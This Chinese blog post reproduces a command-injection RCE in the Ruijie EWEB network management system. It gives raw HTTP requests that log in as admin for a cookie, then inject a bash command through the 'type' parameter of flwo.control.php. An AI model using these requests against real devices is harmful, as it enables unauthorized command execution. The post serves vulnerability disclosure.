锐捷EWEB网管系统RCE漏洞

抠脚大汉在网络 2024-08-21 13:33:02 阅读 100

文章目录

免责声明漏洞描述漏洞原理影响版本漏洞复现修复建议

免责声明

该文章只为学习和交流,请不要做违法乱纪的事情,如有与本人无关

漏洞描述

锐捷网管系统是由北京锐捷数据时代科技有限公司开发的新一代基于云的网络管理软件,以"数据时代创新网管与信息安全"为口号,定位于终端安全、IT运营及企业服务化管理统一解决方案。

漏洞原理

在该系统的/flow_control_pi/flwo.control.php的文件中存在命令执行参数

影响版本

不详

漏洞复现

在这里插入图片描述

用post请求访问/ddi/server/login.php页面并提交admin参数可以获得管理员的cookie

<code>POST /ddi/server/login.php HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

Content-Length: 30

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip

Connection: close

username=admin&password=admin?

在这里插入图片描述

使用cookie向/flow_control_pi/flwo.control.php?a=getFlowGroup 提交type参数

<code>POST /flow_control_pi/flwo.control.php?a=getFlowGroup HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

Content-Length: 45

Content-Type: application/x-www-form-urlencoded

Cookie: RUIJIEID=q6g97tqc32rl4bl8h89gjub031; user=admin;

Accept-Encoding: gzip

Connection: close

type=|bash+-c+'ping+-c+4+ip'

在这里插入图片描述

修复建议

升级到最新版本



声明

本文内容仅代表作者观点,或转载于其他网站,本站不以此文作为商业用途
如有涉及侵权,请联系本站进行删除
转载本站原创文章,请注明来源及作者。